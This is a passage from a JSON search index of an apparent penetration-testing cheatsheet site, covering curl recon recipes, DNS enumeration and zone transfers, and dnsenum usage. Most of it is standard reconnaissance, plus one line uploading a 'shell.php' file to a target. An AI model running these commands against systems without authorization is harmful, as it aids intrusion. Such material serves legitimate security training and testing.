style=\"color:#e6db74\"\u003e\u0026#34;Host: dev.target.tld\u0026#34;\u003c/span\u003e http://\u0026lt;ip\u0026gt;/ -o dev.html\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -sI --resolve target.tld:443:\u0026lt;ip\u0026gt; https://target.tld/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Host: admin.internal\u0026#34;\u003c/span\u003e 
http://\u0026lt;ip\u0026gt;/      \u003cspan style=\"color:#75715e\"\u003e# Find vhosts on shared IP\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"cookies--sessions\"\u003eCookies \u0026amp; Sessions\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -c cookies.txt -b cookies.txt https://target.tld/login\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -b \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;session=abcd1234\u0026#34;\u003c/span\u003e https://target.tld/dashboard\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -c - https://target.tld/                        \u003cspan style=\"color:#75715e\"\u003e# Print Set-Cookie to stdout\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"authentication\"\u003eAuthentication\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -u admin:password https://target.tld/admin      \u003cspan style=\"color:#75715e\"\u003e# Basic\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Authorization: Bearer \u0026lt;jwt\u0026gt;\u0026#34;\u003c/span\u003e https://api.target.tld/\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003ecurl --ntlm -u \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;DOMAIN\\user:pass\u0026#39;\u003c/span\u003e https://target.tld/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl --digest -u user:pass https://target.tld/\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"post--api-testing\"\u003ePOST / API Testing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Form data\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -X POST -d \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;user=admin\u0026amp;pass=admin\u0026#34;\u003c/span\u003e https://target.tld/login\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Raw JSON\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -X POST -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Content-Type: application/json\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -d \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;{\u0026#34;user\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;pass\u0026#34;:\u0026#34;admin\u0026#34;}\u0026#39;\u003c/span\u003e \u003cspan 
style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  https://target.tld/api/login\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# File from disk\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -X POST -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Content-Type: application/json\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --data-binary @payload.json https://target.tld/api\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Multipart upload\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -F \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;file=@shell.php\u0026#34;\u003c/span\u003e -F \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;submit=upload\u0026#34;\u003c/span\u003e https://target.tld/upload.php\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"proxy-burp--zap\"\u003eProxy (Burp / ZAP)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -x http://127.0.0.1:8080 -k https://target.tld/\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003eexport https_proxy\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003ehttp://127.0.0.1:8080             \u003cspan style=\"color:#75715e\"\u003e# Per-shell proxy\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"useful-write-out-format\"\u003eUseful Write-Out Format\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s -o /dev/null -w \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;code:%{http_code}  size:%{size_download}  time:%{time_total}s  redir:%{redirect_url}\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  https://target.tld/\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"fingerprinting-recipes\"\u003eFingerprinting Recipes\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Quick stack identification\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003ecurl -sIL https://target.tld | grep -iE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;server|x-powered-by|x-generator|x-drupal|x-aspnet\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Pull robots.txt + sitemap\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s https://target.tld/robots.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s https://target.tld/sitemap.xml | head\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Search response body for tech tells\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s https://target.tld/ | grep -iE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;wp-content|drupal|joomla|laravel|generator=\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Check common admin / framework paths\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003efor\u003c/span\u003e p in admin login wp-admin administrator phpmyadmin server-status; \u003cspan style=\"color:#66d9ef\"\u003edo\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  printf \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;%-20s 
\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e$p\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  curl -sk -o /dev/null -w \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;%{http_code}\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://target.tld/\u003c/span\u003e$p\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003edone\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"tips\"\u003eTips\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHEAD (\u003ccode\u003e-I\u003c/code\u003e) can lie or be blocked — fall back to \u003ccode\u003e-sI -X GET\u003c/code\u003e and inspect headers from a real GET.\u003c/li\u003e\n\u003cli\u003eCombine \u003ccode\u003e-v\u003c/code\u003e with \u003ccode\u003e-o /dev/null\u003c/code\u003e to inspect headers without dumping a big body.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e--resolve\u003c/code\u003e beats editing \u003ccode\u003e/etc/hosts\u003c/code\u003e for one-off vhost checks.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e-k\u003c/code\u003e is for testing only; never disable cert checks in production tooling.\u003c/li\u003e\n\u003c/ul\u003e","title":"curl"},{"content":"DNS Enumeration Cheatsheet Default Port: 53 (TCP/UDP)\nKey DNS Record Types Record Description A IPv4 address AAAA IPv6 address MX Mail server NS Name server TXT Text records (SPF, DMARC, verification) CNAME Canonical name / alias SOA Start of authority PTR Reverse lookup SRV Service location Basic 
Lookups # host host \u0026lt;domain\u0026gt; host -t A \u0026lt;domain\u0026gt; host -t MX \u0026lt;domain\u0026gt; host -t NS \u0026lt;domain\u0026gt; host -t TXT \u0026lt;domain\u0026gt; host -t CNAME \u0026lt;domain\u0026gt; # dig dig \u0026lt;domain\u0026gt; dig \u0026lt;domain\u0026gt; ANY dig \u0026lt;domain\u0026gt; A dig \u0026lt;domain\u0026gt; MX dig \u0026lt;domain\u0026gt; NS dig \u0026lt;domain\u0026gt; TXT dig @\u0026lt;nameserver\u0026gt; \u0026lt;domain\u0026gt; ANY +noall +answer # nslookup nslookup \u0026lt;domain\u0026gt; nslookup -type=MX \u0026lt;domain\u0026gt; nslookup -type=NS \u0026lt;domain\u0026gt; Zone Transfer dig axfr @\u0026lt;nameserver\u0026gt; \u0026lt;domain\u0026gt; host -l \u0026lt;domain\u0026gt; \u0026lt;nameserver\u0026gt; fierce --domain \u0026lt;domain\u0026gt; Subdomain Enumeration # dnsenum dnsenum --dnsserver \u0026lt;ns\u0026gt; --enum -p 0 -s 0 -o output.txt -f wordlist.txt \u0026lt;domain\u0026gt; dnsenum --enum inlanefreight.htb -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r # dnsrecon dnsrecon -d \u0026lt;domain\u0026gt; -t std # Standard enumeration dnsrecon -d \u0026lt;domain\u0026gt; -t axfr # Zone transfer attempt dnsrecon -d \u0026lt;domain\u0026gt; -t brt -D wordlist.txt # Brute force subdomains # gobuster DNS mode gobuster dns -d \u0026lt;domain\u0026gt; -w wordlist.txt -r \u0026lt;nameserver\u0026gt; # Sublist3r sublist3r -d \u0026lt;domain\u0026gt; # Amass amass enum -d \u0026lt;domain\u0026gt; amass enum -passive -d \u0026lt;domain\u0026gt; Nmap DNS Scripts nmap -p 53 --script dns-brute \u0026lt;domain\u0026gt; nmap -p 53 --script dns-zone-transfer \\ --script-args dns-zone-transfer.domain=\u0026lt;domain\u0026gt; \u0026lt;nameserver\u0026gt; nmap -p 53 --script dns-nsid \u0026lt;nameserver\u0026gt; nmap -p 53 --script dns-recursion \u0026lt;nameserver\u0026gt; nmap -p 53 --script dns-cache-snoop \u0026lt;nameserver\u0026gt; Reverse DNS Lookup dig -x \u0026lt;ip\u0026gt; host 
\u0026lt;ip\u0026gt; dnsrecon -r \u0026lt;cidr\u0026gt; -t rvl # Example dig -x 192.168.1.1 host 192.168.1.1 Wordlists (SecLists) /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/dns/","title":"DNS"},{"content":"dnsenum Cheatsheet Type: Comprehensive DNS enumeration — dictionary \u0026amp; brute-force subdomain discovery\nInstallation sudo apt install dnsenum # or git clone https://github.com/fwaeytens/dnsenum.git Basic Usage dnsenum \u0026lt;domain\u0026gt; dnsenum example.com Common Flags Flag Description --dnsserver \u0026lt;ns\u0026gt; Use a specific DNS server -f \u0026lt;wordlist\u0026gt; Wordlist for subdomain brute force -r Enable recursive brute force on found subdomains -p \u0026lt;pages\u0026gt; Number of Google scraping pages (default: 5) -s \u0026lt;results\u0026gt; Maximum results from Google scraping -o \u0026lt;file\u0026gt; Output to XML file --enum Shortcut: enables brute force, threads, Google scraping --threads \u0026lt;n\u0026gt; Number of threads for brute forcing 
--noreverse Skip reverse lookup on found IP ranges --nocolor Disable colored output -v Verbose output --timeout \u0026lt;s\u0026gt; DNS query timeout in seconds Common Commands # Full enumeration with brute force dnsenum --dnsserver \u0026lt;ns\u0026gt; --enum -p 0 -s 0 -f wordlist.txt \u0026lt;domain\u0026gt; # Brute force with threads, no Google scraping dnsenum -f wordlist.txt --threads 20 --noreverse \u0026lt;domain\u0026gt; # Output to XML dnsenum -f wordlist.txt -o output.xml \u0026lt;domain\u0026gt; # Recursive brute force (enumerate found subdomains too) dnsenum -f wordlist.txt -r \u0026lt;domain\u0026gt; # Suppress Google scraping (clean/offline) dnsenum -p 0 -s 0 -f wordlist.txt \u0026lt;domain\u0026gt; # Use specific nameserver dnsenum --dnsserver 8.8.8.8 -f wordlist.txt \u0026lt;domain\u0026gt; What dnsenum Does Automatically 1. Queries A, NS, MX records 2. Attempts zone transfer (AXFR) on each nameserver 3. Google scraping for subdomains (unless -p 0 -s 0) 4. Reverse lookups on found IP ranges 5. 
Brute forces subdomains from wordlist (if -f provided) Recommended Wordlists /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt /usr/share/wordlists/dnsmap.txt Example Full Run dnsenum --dnsserver 8.8.8.8 \\ --enum \\ -p 0 -s 0 \\ --threads 20 \\ -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\ -o results.xml \\ example.com ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/dnsenum/","summary":"\u003ch1 id=\"dnsenum-cheatsheet\"\u003ednsenum Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Comprehensive DNS enumeration — dictionary \u0026amp; brute-force subdomain discovery\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install dnsenum\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egit clone https://github.com/fwaeytens/dnsenum.git\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003ednsenum \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum example.com\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--dnsserver \u0026lt;ns\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse a specific DNS server\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-f \u0026lt;wordlist\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWordlist for subdomain brute force\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eEnable recursive brute force on found subdomains\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-p \u0026lt;pages\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNumber of Google scraping pages (default: 5)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-s \u0026lt;results\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMaximum results from Google scraping\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-o \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput to XML 
file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--enum\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eShortcut: enables brute force, threads, Google scraping\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--threads \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNumber of threads for brute forcing\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--noreverse\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSkip reverse lookup on found IP ranges\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--nocolor\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable colored output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--timeout \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDNS query timeout in seconds\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-commands\"\u003eCommon Commands\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Full enumeration with brute force\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum --dnsserver \u0026lt;ns\u0026gt; --enum -p \u003cspan 
style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -s \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -f wordlist.txt \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Brute force with threads, no Google scraping\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum -f wordlist.txt --threads \u003cspan style=\"color:#ae81ff\"\u003e20\u003c/span\u003e --noreverse \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Output to XML\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum -f wordlist.txt -o output.xml \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Recursive brute force (enumerate found subdomains too)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum -f wordlist.txt -r \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Suppress Google scraping (clean/offline)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum -p \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -s \u003cspan 
style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -f wordlist.txt \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Use specific nameserver\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum --dnsserver 8.8.8.8 -f wordlist.txt \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"what-dnsenum-does-automatically\"\u003eWhat dnsenum Does Automatically\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e1. Queries A, NS, MX records\n2. Attempts zone transfer (AXFR) on each nameserver\n3. Google scraping for subdomains (unless -p 0 -s 0)\n4. Reverse lookups on found IP ranges\n5. Brute forces subdomains from wordlist (if -f provided)\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"recommended-wordlists\"\u003eRecommended Wordlists\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
